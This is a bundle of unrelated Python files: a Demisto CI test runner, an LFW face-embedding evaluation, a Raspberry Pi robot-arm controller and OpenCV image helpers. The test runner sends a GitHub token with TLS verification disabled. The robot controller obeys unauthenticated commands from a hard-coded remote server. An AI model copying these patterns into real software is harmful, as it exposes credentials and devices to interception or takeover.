        if record_name and record_name in tests_names_to_search:
            matching_records.append(record)
    return matching_records
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
                    tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
    """Run all mockable and unmockable tests against a single server instance.

    Mockable tests run first through the MITM proxy (to avoid mockless side
    effects in containers); the containers are then reset and the unmockable
    tests run directly. Results are folded into `tests_data_keeper` even when
    an exception aborts the run (the exception is re-raised after recording).

    Fix: the thread-failure print was missing a space ('Thread {i}failed'),
    inconsistent with the message appended to failed_playbooks right below it.
    """
    server = SERVER_URL.format(server_ip)
    server_numeric_version = tests_settings.serverNumericVersion
    start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
    prints_manager.add_print_job(start_message, print, thread_index)
    is_nightly = tests_settings.nightly
    is_memory_check = tests_settings.memCheck
    slack = tests_settings.slack
    circle_ci = tests_settings.circleci
    build_number = tests_settings.buildNumber
    build_name = tests_settings.buildName
    conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    demisto_api_key = tests_settings.api_key
    default_test_timeout = conf.get('testTimeout', 30)
    tests = conf['tests']
    skipped_tests_conf = conf['skipped_tests']
    nightly_integrations = conf['nightly_integrations']
    skipped_integrations_conf = conf['skipped_integrations']
    unmockable_integrations = conf['unmockable_integrations']
    secret_params = secret_conf['integrations'] if secret_conf else []
    filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
    if is_filter_configured and not run_all_tests:
        # A configured filter makes nightly-only tests eligible as well.
        is_nightly = True
    if not tests or len(tests) == 0:
        prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
        prints_manager.execute_thread_prints(thread_index)
        return
    # turn off telemetry
    turn_off_telemetry(server, demisto_api_key)
    proxy = None
    if is_ami:
        ami = AMIConnection(server_ip)
        ami.clone_mock_data()
        proxy = MITMProxy(server_ip)
    failed_playbooks = []
    succeed_playbooks = []
    skipped_tests = set([])
    skipped_integration = set([])
    playbook_skipped_integration = set([])
    disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
    prints_manager.execute_thread_prints(thread_index)
    mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
    unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
    if is_nightly and is_memory_check:
        mem_lim, err = get_docker_limit()
        send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
                           f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
                           'Content CircleCI', 'False')
    try:
        # first run the mock tests to avoid mockless side effects in container
        if is_ami and mockable_tests:
            proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
            for t in mockable_tests:
                run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
                                  nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
                                  run_all_tests, is_filter_configured, filtered_tests,
                                  skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
                                  unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
                                  build_name, server_numeric_version, demisto_api_key, prints_manager,
                                  thread_index=thread_index)
            proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
            # reset containers after clearing the proxy server configuration
            reset_containers(server, demisto_api_key, prints_manager, thread_index)
        prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
        for t in unmockable_tests:
            run_test_scenario(tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
                              skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests,
                              is_filter_configured, filtered_tests, skipped_tests, secret_params, failed_playbooks,
                              playbook_skipped_integration,
                              unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
                              build_name, server_numeric_version, demisto_api_key,
                              prints_manager, thread_index, is_ami)
            prints_manager.execute_thread_prints(thread_index)
    except Exception as exc:
        prints_manager.add_print_job(f'~~ Thread {thread_index} failed ~~\n{str(exc)}\n{traceback.format_exc()}',
                                     print_error, thread_index)
        failed_playbooks.append(f'~~ Thread {thread_index} failed ~~')
        raise
    finally:
        # Always record whatever completed, even when aborting on an exception.
        tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
                                         skipped_integration, unmockable_integrations)
        if is_ami:
            tests_data_keeper.add_proxy_related_test_data(proxy)
            if build_name == 'master':
                updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
                prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
                ami.upload_mock_files(build_name, build_number)
        if playbook_skipped_integration and build_name == 'master':
            comment = 'The following integrations are skipped and critical for the test:\n {}'.\
                format('\n- '.join(playbook_skipped_integration))
            add_pr_comment(comment)
def get_unmockable_tests(tests_settings):
    """Return the playbook IDs of tests that cannot run against the mock proxy.

    A test is unmockable when it uses no integrations at all, or when at least
    one of its integrations appears under 'unmockable_integrations' in conf.
    """
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    unmockable = conf['unmockable_integrations']
    result = []
    for record in conf['tests']:
        playbook_id = record.get("playbookID")
        if not playbook_id:
            continue
        used = get_used_integrations(record)
        if not used or any(name in unmockable for name in used):
            result.append(playbook_id)
    return result
def get_all_tests(tests_settings):
    """Return every non-empty playbook ID listed in the 'tests' section of conf."""
    conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
    return [record.get("playbookID")
            for record in conf['tests']
            if record.get("playbookID")]
def manage_tests(tests_settings):
    """
    This function manages the execution of Demisto's tests.

    Three mutually exclusive modes, chosen from the settings:
      1. Explicit server supplied -> run everything (unmocked) on that server.
      2. AMI mode -> run on the AMI instance(s); nightly builds fan out one
         thread per instance, otherwise a single sequential run.
      3. Fallback -> assume a latest server on the first instance IP.

    Exits the process with status 1 when any playbook failed; otherwise writes
    a "Build passed" marker file.

    Args:
        tests_settings (TestsSettings): An object containing all the relevant
            data regarding how the tests should be run.
    """
    tests_settings.serverNumericVersion = get_and_print_server_numeric_version(tests_settings)
    instances_ips = get_instances_ips_and_names(tests_settings)
    is_nightly = tests_settings.nightly
    number_of_instances = len(instances_ips)
    prints_manager = ParallelPrintsManager(number_of_instances)
    tests_data_keeper = TestsDataKeeper()
    if tests_settings.server:
        # If the user supplied a server - all tests will be done on that server.
        server_ip = tests_settings.server
        print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
        print("Starts tests with server url - https://{}".format(server_ip))
        all_tests = get_all_tests(tests_settings)
        mockable_tests = []
        print(tests_settings.specific_tests_to_run)
        # With no proxy available, everything runs unmocked.
        unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
        execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
                        thread_index=0, is_ami=False)
    elif tests_settings.isAMI:
        # Running tests in AMI configuration.
        # This is the way we run most tests, including running Circle for PRs and nightly.
        if is_nightly:
            # If the build is a nightly build, run tests in parallel.
            test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
            current_thread_index = 0
            all_unmockable_tests_list = get_unmockable_tests(tests_settings)
            threads_array = []
            for ami_instance_name, ami_instance_ip in instances_ips:
                if ami_instance_name == tests_settings.serverVersion:  # Only run tests for given AMI Role
                    current_instance = ami_instance_ip
                    tests_allocation_for_instance = test_allocation[current_thread_index]
                    # Split this instance's allocation into mockable / unmockable.
                    unmockable_tests = [test for test in all_unmockable_tests_list
                                        if test in tests_allocation_for_instance]
                    mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
                    print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
                    print("Starts tests with server url - https://{}".format(ami_instance_ip))
                    if number_of_instances == 1:
                        # Single instance: no need to spawn a thread.
                        execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
                                        tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
                    else:
                        thread_kwargs = {
                            "tests_settings": tests_settings,
                            "server_ip": current_instance,
                            "mockable_tests_names": mockable_tests,
                            "unmockable_tests_names": unmockable_tests,
                            "thread_index": current_thread_index,
                            "prints_manager": prints_manager,
                            "tests_data_keeper": tests_data_keeper,
                        }
                        t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
                        threads_array.append(t)
                        t.start()
                        current_thread_index += 1
            for t in threads_array:
                t.join()
        else:
            # Non-nightly AMI run: one sequential pass per matching instance.
            for ami_instance_name, ami_instance_ip in instances_ips:
                if ami_instance_name == tests_settings.serverVersion:
                    print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
                    print("Starts tests with server url - https://{}".format(ami_instance_ip))
                    all_tests = get_all_tests(tests_settings)
                    unmockable_tests = get_unmockable_tests(tests_settings)
                    mockable_tests = [test for test in all_tests if test not in unmockable_tests]
                    execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
                                    tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
                    sleep(8)
    else:
        # TODO: understand better when this occurs and what will be the settings
        # This case is rare, and usually occurs on two cases:
        # 1. When someone from Server wants to trigger a content build on their branch.
        # 2. When someone from content wants to run tests on a specific build.
        server_numeric_version = '99.99.98'  # assume latest
        print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
        instance_ip = instances_ips[0][1]
        all_tests = get_all_tests(tests_settings)
        execute_testing(tests_settings, instance_ip, [], all_tests,
                        tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
    print_test_summary(tests_data_keeper, tests_settings.isAMI)
    create_result_files(tests_data_keeper)
    if tests_data_keeper.failed_playbooks:
        tests_failed_msg = "Some tests have failed. Not destroying instances."
        print(tests_failed_msg)
        sys.exit(1)
    else:
        # Marker file consumed by later CI steps to decide instance teardown.
        file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
        with open(file_path, "w") as is_build_passed_file:
            is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
    """Post *comment* on the open GitHub PR matching the current CI commit/branch.

    Looks the PR up via the GitHub search API using the CircleCI-provided
    commit SHA and branch name. Comments only when exactly one open PR is
    found; otherwise emits a warning. All failures are swallowed with a
    warning so a comment failure never breaks the build.
    """
    token = os.environ['CONTENT_GITHUB_TOKEN']
    branch_name = os.environ['CIRCLE_BRANCH']
    sha1 = os.environ['CIRCLE_SHA1']
    query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
    url = 'https://api.github.com/search/issues'
    headers = {'Authorization': 'Bearer ' + token}
    try:
        res = requests.get(url + query, headers=headers, verify=False)
        res = handle_github_response(res)
        if res and res.get('total_count', 0) == 1:
            issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
            if issue_url:
                res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
                handle_github_response(res)
        else:
            # Bug fix: this branch fires for zero matches as well as several,
            # so the old "more then one open pull request" message was wrong
            # (and misspelled). Report the actual count instead.
            print_warning('Add pull request comment failed: expected exactly one open pull request for branch {},'
                          ' found {}.'.format(branch_name, res.get('total_count', 0) if res else 0))
    except Exception as e:
        print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
    """Return the JSON body of a GitHub API response, warning on HTTP failure.

    Bug fix: the failure check used to read ``res_dict.ok`` on the parsed
    JSON dict, which raised AttributeError; the ``ok`` flag lives on the
    requests.Response object itself.
    """
    res_dict = response.json()
    if not response.ok:
        print_warning('Add pull request comment failed: {}'.
                      format(res_dict.get('message')))
    return res_dict
def main():
    """Entry point: parse CLI options, apply the master-branch delay, run the tests."""
    print("Time is: {}\n\n\n".format(datetime.now()))
    tests_settings = options_handler()
    # should be removed after solving: https://github.com/demisto/etc/issues/21383
    # -------------
    if 'master' in tests_settings.serverVersion.lower():
        # Bug fix: the message used to claim 30 secs while the code sleeps 45.
        print('[{}] sleeping for 45 secs'.format(datetime.now()))
        sleep(45)
    # -------------
    manage_tests(tests_settings)


if __name__ == '__main__':
    main()
|
lfw_eval.py | import multiprocessing as mp
import os
import pickle
import queue
from multiprocessing import Process
import cv2 as cv
import dlib
import numpy as np
from keras.applications.inception_resnet_v2 import preprocess_input
from tqdm import tqdm
from Base.config import lfw_folder, img_size, channel, threshold, predictor_path
from Base.utils import get_lfw_images, get_lfw_pairs, get_best_model
class InferenceWorker(Process):
    """Worker process that embeds LFW triplet images on one dedicated GPU.

    Pulls image names from ``in_queue`` three at a time (anchor / positive /
    negative), aligns each face with dlib when one is detected, runs the
    triplet model, and pushes one ``{'image_name', 'embedding'}`` dict per
    image onto ``out_queue``. One SENTINEL token per processed triplet goes
    to ``signal_queue`` for progress reporting.
    """

    def __init__(self, gpuid, in_queue, out_queue, signal_queue):
        Process.__init__(self, name='ImageProcessor')
        self.gpuid = gpuid
        self.in_queue = in_queue
        self.out_queue = out_queue
        self.signal_queue = signal_queue
        # dlib face detector + 5-point landmark predictor used for alignment.
        self.detector = dlib.get_frontal_face_detector()
        self.sp = dlib.shape_predictor(predictor_path)

    def run(self):
        # Pin this process to its assigned GPU before importing/loading Keras.
        os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
        os.environ["CUDA_VISIBLE_DEVICES"] = str(self.gpuid)
        print("InferenceWorker init, GPU ID: {}".format(self.gpuid))
        # Import here (not at module level) so the model binds to this
        # process's CUDA_VISIBLE_DEVICES setting.
        from Base.model import build_model
        # load models
        model = build_model()
        model.load_weights(get_best_model())
        while True:
            try:
                sample = {}
                try:
                    # Non-blocking gets: an empty queue means the work is done.
                    # NOTE(review): if the queue empties mid-triplet, the
                    # partially-read names are dropped — confirm acceptable.
                    sample['a'] = self.in_queue.get(block=False)
                    sample['p'] = self.in_queue.get(block=False)
                    sample['n'] = self.in_queue.get(block=False)
                except queue.Empty:
                    break
                batch_inputs = np.empty((3, 1, img_size, img_size, channel), dtype=np.float32)
                for j, role in enumerate(['a', 'p', 'n']):
                    image_name = sample[role]
                    filename = os.path.join(lfw_folder, image_name)
                    image = cv.imread(filename)
                    image = image[:, :, ::-1]  # BGR -> RGB
                    dets = self.detector(image, 1)
                    num_faces = len(dets)
                    if num_faces > 0:
                        # Find the 5 face landmarks we need to do the alignment.
                        faces = dlib.full_object_detections()
                        for detection in dets:
                            faces.append(self.sp(image, detection))
                        # Align on the first detected face only.
                        image = dlib.get_face_chip(image, faces[0], size=img_size)
                    else:
                        # No face found: fall back to a plain resize.
                        image = cv.resize(image, (img_size, img_size), cv.INTER_CUBIC)
                    batch_inputs[j, 0] = preprocess_input(image)
                y_pred = model.predict([batch_inputs[0], batch_inputs[1], batch_inputs[2]])
                # The model concatenates the three 128-d embeddings into one row.
                a = y_pred[0, 0:128]
                p = y_pred[0, 128:256]
                n = y_pred[0, 256:384]
                self.out_queue.put({'image_name': sample['a'], 'embedding': a})
                self.out_queue.put({'image_name': sample['p'], 'embedding': p})
                self.out_queue.put({'image_name': sample['n'], 'embedding': n})
                # One progress tick per triplet.
                self.signal_queue.put(SENTINEL)
                if self.in_queue.qsize() == 0:
                    break
            except Exception as e:
                # Best-effort: log and keep consuming the queue.
                print(e)
        import keras.backend as K
        K.clear_session()
        print('InferenceWorker done, GPU ID {}'.format(self.gpuid))
class Scheduler:
    """Fans image names out to one InferenceWorker per GPU and collects results."""

    def __init__(self, gpuids, signal_queue):
        self.signal_queue = signal_queue
        queue_manager = mp.Manager()
        self.in_queue = queue_manager.Queue()
        self.out_queue = queue_manager.Queue()
        self._gpuids = gpuids
        # One worker process per GPU, all sharing the same queues.
        self._workers = [
            InferenceWorker(gpu, self.in_queue, self.out_queue, self.signal_queue)
            for gpu in self._gpuids
        ]

    def start(self, names):
        """Enqueue every name, run all workers to completion, return the output queue."""
        # Feed the shared input queue before any worker starts.
        for image_name in names:
            self.in_queue.put(image_name)
        for worker in self._workers:
            worker.start()
        # Block until every worker process has exited.
        for worker in self._workers:
            worker.join()
        print("all of workers have been done")
        return self.out_queue
def run(gpuids, q):
    """Embed every LFW image on the given GPUs and return the results queue."""
    image_names = get_lfw_images()
    scheduler = Scheduler(gpuids, q)
    return scheduler.start(image_names)
# Token the workers push onto the signal queue once per processed triplet.
SENTINEL = 1


def listener(q):
    """Progress thread: tick the bar for every token until a None arrives."""
    # 13233 LFW images, consumed three per triplet.
    pbar = tqdm(total=13233 // 3)
    for item in iter(q.get, None):
        pbar.update()
def create_lfw_embeddings():
    """Compute embeddings for all LFW images and pickle them to disk."""
    gpu_ids = ['0', '1', '2', '3']
    print(gpu_ids)
    progress_queue = mp.Manager().Queue()
    progress_proc = mp.Process(target=listener, args=(progress_queue,))
    progress_proc.start()
    result_queue = run(gpu_ids, progress_queue)
    # Drain the result queue; all workers have joined by now.
    results = []
    while result_queue.qsize() > 0:
        results.append(result_queue.get())
    with open("data/lfw_embeddings.p", "wb") as out_file:
        pickle.dump(results, out_file)
    # A None terminates the listener's iter(q.get, None) loop.
    progress_queue.put(None)
    progress_proc.join()
if __name__ == "__main__":
    # Step 1: compute and persist embeddings for the whole LFW dataset.
    print('creating lfw embeddings')
    create_lfw_embeddings()
    with open('data/lfw_embeddings.p', 'rb') as file:
        embeddings = pickle.load(file)
    # Step 2: evaluate verification accuracy over the standard LFW pairs.
    pairs = get_lfw_pairs()
    y_true_list = []
    y_pred_list = []
    print('evaluating lfw database')
    for pair in tqdm(pairs):
        image_name_1 = pair['image_name_1']
        image_name_2 = pair['image_name_2']
        y_true = pair['same_person']
        y_true_list.append(y_true)
        # Linear scan per lookup; assumes both names exist in the embeddings.
        embedding_1 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_1][0])
        embedding_2 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_2][0])
        # Squared Euclidean distance; same-person iff within the threshold.
        dist = np.square(np.linalg.norm(embedding_1 - embedding_2))
        y_pred = dist <= threshold
        y_pred_list.append(y_pred)
    y = np.array(y_true_list).astype(np.int32)
    pred = np.array(y_pred_list).astype(np.int32)
    from sklearn import metrics
    print(y)
    print(pred)
    # AUC over binary predictions (not raw distances).
    fpr, tpr, thresholds = metrics.roc_curve(y, pred)
    print('showing lfw accuracy: ' + str(metrics.auc(fpr, tpr)))
|
main.py | from servo import *
from TempSensor import *
from DistanceSensor import *
import time
import threading
import json
import urllib.request
from urllib.parse import urlencode
from programs import *
# Temperature/humidity sensor wired to GPIO pin 23.
DHT11 = temp_sensor(23)

# Latest commanded servo angles; written by the network thread (main2) and
# applied to the motors by the main loop.
command = dict()
command["motor1"] = 0   # base left/right
command["motor2"] = 0   # arm up/down
command["motor3"] = 0   # arm forward/backward
command["motor4"] = 0   # gripper clockwise/counter-clockwise
command["motor5"] = 90  # gripper open/close

# NOTE(review): `global` at module level is a no-op; kept as-is.
global program
program = "manual"       # current operating mode, "manual" or a program name
global program_flag
program_flag = False     # set when a canned program is running
global Humidity
Humidity = 0             # latest DHT11 humidity reading
global Temperature
Temperature = 0          # latest DHT11 temperature reading
def update_sensor_vals():
    """Poll the DHT11 sensor forever, refreshing the global readings every 0.2 s."""
    global Humidity
    global Temperature
    while True:
        Humidity, Temperature = DHT11.get_temp_and_hum()
        time.sleep(0.2)
# def polling_thread():
# response_dict = dict()
# global Temperature
# global Humidity
# global program
# global program_flag
# while(True):
# data = urlencode({"humidity":Humidity,"temperature":Temperature}).encode()
# url = 'http://shadyganem.com/dataExchange.php'
# try:
# with urllib.request.urlopen(url,data) as response:
# res = response.read(100)
# response_dict = json.loads(res.decode())
# mode = response_dict.get("mode","manual")
# global program_flag
# if mode == "manual":
# command["motor1"] = int(response_dict.get("motor1",90))
# command["motor2"] = int(response_dict.get("motor2",90))
# command["motor5"] = int(response_dict.get("motor5",90))
# command["motor3"] = int(response_dict.get("motor3",90))
# command["motor4"] = int(response_dict.get("motor4",90))
# else:
# print("selected mode = {}".format(mode))
# program = mode
# for key,val in response_dict.items():
# print(key+" : "+val)
# except Exception as e:
# print("\033[91mConnection with server is down\033[0m {}".format(str(e)))
def main2():
    """Network thread: stream sensor readings to the control server and apply
    the motor commands it sends back.

    Loops until the connection errors out (the exception is re-raised after
    the socket is closed) or the process is interrupted.
    """
    global Temperature
    global Humidity
    global program
    global program_flag
    import socket
    Host = "160.153.249.247"
    Port = 1234
    # Bug fix: the socket used to be created inside the try block, so a
    # failure before the assignment made the except/finally handlers raise
    # NameError on `client_socket`, masking the real error.
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client_socket.connect((Host, Port))
        print("connected")
        while True:
            # Push the current readings, then block for the next command frame.
            out_msg = '{"humidity":"' + str(Humidity) + '","temperature":"' + str(Temperature) + '"}'
            client_socket.send(bytes(out_msg, 'utf-8'))
            msg = client_socket.recv(1024).decode('utf-8')
            print(msg)
            response_dict = json.loads(msg)
            mode = response_dict.get("mode", "manual")
            if mode == "manual":
                # Missing keys default to the 90-degree neutral position.
                command["motor1"] = int(response_dict.get("motor1", 90))
                command["motor2"] = int(response_dict.get("motor2", 90))
                command["motor5"] = int(response_dict.get("motor5", 90))
                command["motor3"] = int(response_dict.get("motor3", 90))
                command["motor4"] = int(response_dict.get("motor4", 90))
            else:
                print("selected mode = {}".format(mode))
                program = mode
    except Exception:
        print("socket closed")
        # Bug fix: bare raise preserves the original traceback (`raise e`
        # re-raised from here); the finally block handles the close.
        raise
    except KeyboardInterrupt:
        print("FUCK YOU ALL")
    finally:
        client_socket.close()
def main():
    """Robot-arm control loop: spawn the network and sensor threads, then
    continuously drive the servos from the shared `command` dict."""
    global program
    global program_flag
    # Background thread that talks to the remote control server.
    get_commamds = threading.Thread(target=main2)
    get_commamds.start()
    # Background thread that refreshes the global temperature/humidity values.
    read_sensor = threading.Thread(target=update_sensor_vals)
    read_sensor.start()
    distance_sensor = dist_sensor(4, 17)
    driver = servo_driver()
    # Servos on PWM channels 0/3/6/9/12; second argument is the initial angle.
    motor1 = motor(driver, 0, 90)
    motor2 = motor(driver, 3, 0)
    motor3 = motor(driver, 6, 0)
    motor4 = motor(driver, 9, 0)
    motor5 = motor(driver, 12, 0)
    # NOTE(review): channel 15 is held at 90 each cycle — presumably a dummy
    # channel to keep the driver refreshed; confirm against the hardware.
    virtual_motor = motor(driver, 15, 0)
    while(True):
        if program == "manual":
            # Apply the latest remotely-commanded angles.
            motor1.set_angle(command["motor1"])
            motor2.set_angle(command["motor2"])
            motor3.set_angle(command["motor3"])
            motor4.set_angle(command["motor4"])
            motor5.set_angle(command["motor5"])
            virtual_motor.set_angle(90)
        elif program == "program1":
            program_flag = True
            print("running program1")
            # Drop straight back to manual after announcing the program.
            program = "manual"
    # NOTE(review): unreachable — the while loop above never exits.
    get_commamds.join()


if __name__ == "__main__":
    main()
|
utils_opencv.py | import cv2
import numpy as np
from threading import Thread
from PIL import Image
try:
from queue import Queue
except ImportError:
from Queue import Queue
cv2_version = cv2.__version__.split('.')[0]
FACE_PAD = 50
class VideoStream(object):
    """Threaded wrapper around cv2.VideoCapture that prefetches frames into a queue."""

    def __init__(self, url, queueSize=4):
        self.stream = cv2.VideoCapture(url)
        if cv2_version == '3':
            self.stream.set(cv2.CAP_PROP_BUFFERSIZE, 3)
        self.stopped = False
        self.frameBuffer = Queue(maxsize=queueSize)

    def start(self):
        """Spawn the background reader thread; returns self for chaining."""
        reader = Thread(target=self.update, args=())
        reader.daemon = True
        reader.start()
        return self

    def update(self):
        """Reader loop: keep the buffer topped up until stopped or the stream ends."""
        while self.stream.isOpened():
            if self.stopped:
                return
            if self.frameBuffer.full():
                # Buffer full — spin until the consumer drains a frame.
                continue
            grabbed, frame = self.stream.read()
            if not grabbed:
                # End of stream: flag ourselves stopped and exit.
                self.stop()
                return
            self.frameBuffer.put(frame)

    def read(self):
        """Pop and return the next buffered frame (blocks while empty)."""
        return self.frameBuffer.get()

    def more(self):
        """True while at least one frame is buffered."""
        return self.frameBuffer.qsize() > 0

    def stop(self):
        """Ask the reader thread to terminate."""
        self.stopped = True
def showImage(img, window='Image'):
    """Display *img* in a named, user-resizeable OpenCV window."""
    cv2.namedWindow(window, cv2.WINDOW_NORMAL)
    cv2.imshow(window, img)
def resizeImg(img, size, keepAspect=False, padding=False):
    """Resize the image to the given size.

    img -- input source image
    size -- (w, h) of the desired resized image
    keepAspect -- preserve the aspect ratio during resize
    padding -- add black padding when the target aspect differs

    Bug fix: the padding slice offsets used true division, which yields
    floats in Python 3 and makes the slice assignments raise TypeError;
    they now use integer (floor) division.
    """
    dtype = img.dtype
    outW, outH = size
    if len(img.shape) > 2:
        h, w, d = img.shape[:3]
        if padding:
            outimg = np.zeros((outH, outW, d), dtype=dtype)
    else:
        h, w = img.shape[:2]
        if padding:
            outimg = np.zeros((outH, outW), dtype=dtype)
    if keepAspect:
        aspect = float(w) / h
        if int(outH * aspect) < outW:  # output is wider, so height is the limiting factor
            newW = int(outH * aspect)
            out = cv2.resize(img, (newW, outH))
            if padding:
                # Centre the resized image horizontally on the black canvas.
                outimg[:, (outW - newW) // 2:(outW + newW) // 2, ] = out
                out = outimg
        else:
            newH = int(outW / aspect)
            out = cv2.resize(img, (outW, newH))
            if padding:
                # Centre the resized image vertically on the black canvas.
                outimg[(outH - newH) // 2:(outH + newH) // 2, ] = out
                out = outimg
    else:
        out = cv2.resize(img, size)
    return out
def subImage(img, bbox, padding_type="50_pixel", padding=FACE_PAD):
    """Crop a region around ``bbox`` from ``img``.

    img -- source image (H x W [x C] ndarray)
    bbox -- {'topleft': {'x', 'y'}, 'bottomright': {'x', 'y'}}
    padding_type -- "50_pixel" (fixed pixel margin), "percentage"
        (margin proportional to the box perimeter), or "coral"
        (square, 120x120 crop as expected by the Coral pipeline)
    padding -- margin in pixels ("50_pixel") or percent ("percentage")
    """
    if padding_type == "50_pixel":
        upper_cut = [min(img.shape[0], int(bbox['bottomright']['y']) + padding),
                     min(img.shape[1], int(bbox['bottomright']['x']) + padding)]
        lower_cut = [max(int(bbox['topleft']['y']) - padding, 0),
                     max(int(bbox['topleft']['x']) - padding, 0)]
        roi_color = img[lower_cut[0]:upper_cut[0], lower_cut[1]:upper_cut[1]]
        return roi_color
    if padding_type == "percentage":
        x1, y1 = bbox['topleft']['x'], bbox['topleft']['y']
        x2, y2 = bbox['bottomright']['x'], bbox['bottomright']['y']
        # Margin proportional to the box perimeter. Bug fixes: this branch
        # referenced an undefined name `imgcv` (NameError) and used true
        # division, producing float slice indices in Python 3.
        offset = padding * (x2 + y2 - x1 - y1) // 200
        upper_cut = [min(img.shape[0], y2 + offset),
                     min(img.shape[1], x2 + offset)]
        lower_cut = [max(y1 - offset, 0),
                     max(x1 - offset, 0)]
        sub_img = img[lower_cut[0]:upper_cut[0], lower_cut[1]:upper_cut[1]]
        return sub_img
    if padding_type == "coral":
        x1, y1 = bbox['topleft']['x'], bbox['topleft']['y']
        x2, y2 = bbox['bottomright']['x'], bbox['bottomright']['y']
        width = x2 - x1
        height = y2 - y1
        tol = 15        # extra margin on every side
        up_down = 5     # upward shift of the crop window
        diff = height - width  # >0: taller than wide — widen; <=0: pad height
        if(diff > 0):
            if not diff % 2:  # symmetric
                y1 = y1-tol-up_down if (y1-tol-up_down) >= 0 else 0
                y2 = y2+tol-up_down if (y2+tol-up_down) < img.shape[0] else img.shape[0]-1
                x1 = x1-tol-int(diff/2) if (x1-tol-int(diff/2)) >= 0 else 0
                x2 = x2+tol+int((diff+1)/2) if (x2+tol+int((diff+1)/2)) < img.shape[1] else img.shape[1]-1
                tmp = img[y1:y2, x1:x2, :]
            else:
                y1 = y1-tol-up_down if (y1-tol-up_down) >= 0 else 0
                y2 = y2+tol-up_down if (y2+tol-up_down) < img.shape[0] else img.shape[0]-1
                x1 = x1-tol-int((diff-1)/2) if (x1-tol-int((diff-1)/2)) >= 0 else 0
                x2 = x2+tol+int((diff+1)/2) if (x2+tol+int((diff+1)/2)) < img.shape[1] else img.shape[1]-1
                tmp = img[y1:y2, x1:x2, :]
        if(diff <= 0):
            if not diff % 2:  # symmetric
                y1 = y1-tol-int(diff/2)-up_down if (y1-tol-int(diff/2)-up_down) >= 0 else 0
                y2 = y2+tol+int(diff/2)-up_down if (y2+tol+int(diff/2)-up_down) < img.shape[0] else img.shape[0]-1
                x1 = x1-tol if (x1-tol) >= 0 else 0
                x2 = x2+tol if (x2+tol) < img.shape[1] else img.shape[1]-1
                tmp = img[y1:y2, x1:x2, :]
            else:
                y1 = y1-tol-int((diff-1)/2)-up_down if (y1-tol-int((diff-1)/2)-up_down) >= 0 else 0
                y2 = y2+tol+int((diff+1)/2)-up_down if (y2+tol+int((diff+1)/2)-up_down) < img.shape[0] else img.shape[0]-1
                x1 = x1-tol if (x1-tol) >= 0 else 0
                x2 = x2+tol if (x2+tol) < img.shape[1] else img.shape[1]-1
                tmp = img[y1:y2, x1:x2, :]
        tmp = np.array(Image.fromarray(np.uint8(tmp)).resize((120, 120), Image.ANTIALIAS))
        return tmp
def rotateImg(img, angle, crop=False):
    """Rotate an image counter-clockwise by the given angle.

    img -- input source image
    angle -- rotation angle in degrees
    crop -- True keeps the original canvas size (corners are cut off);
            False enlarges the canvas so the whole rotated image fits.
    """
    h, w = img.shape[:2]
    centre = (img.shape[1] / 2, img.shape[0] / 2)
    M = cv2.getRotationMatrix2D(centre, angle, 1.0)
    if crop:
        return cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_LINEAR)
    theta = np.deg2rad(angle)
    # Bounding-box size of the rotated image.
    H = abs(h * np.cos(theta) + w * np.sin(theta))
    W = abs(w * np.cos(theta) + h * np.sin(theta))
    # Translate so the rotated content stays centred on the larger canvas.
    M[0, 2] += (W - w) / 2
    M[1, 2] += (H - h) / 2
    return cv2.warpAffine(img, M, (int(W), int(H)))
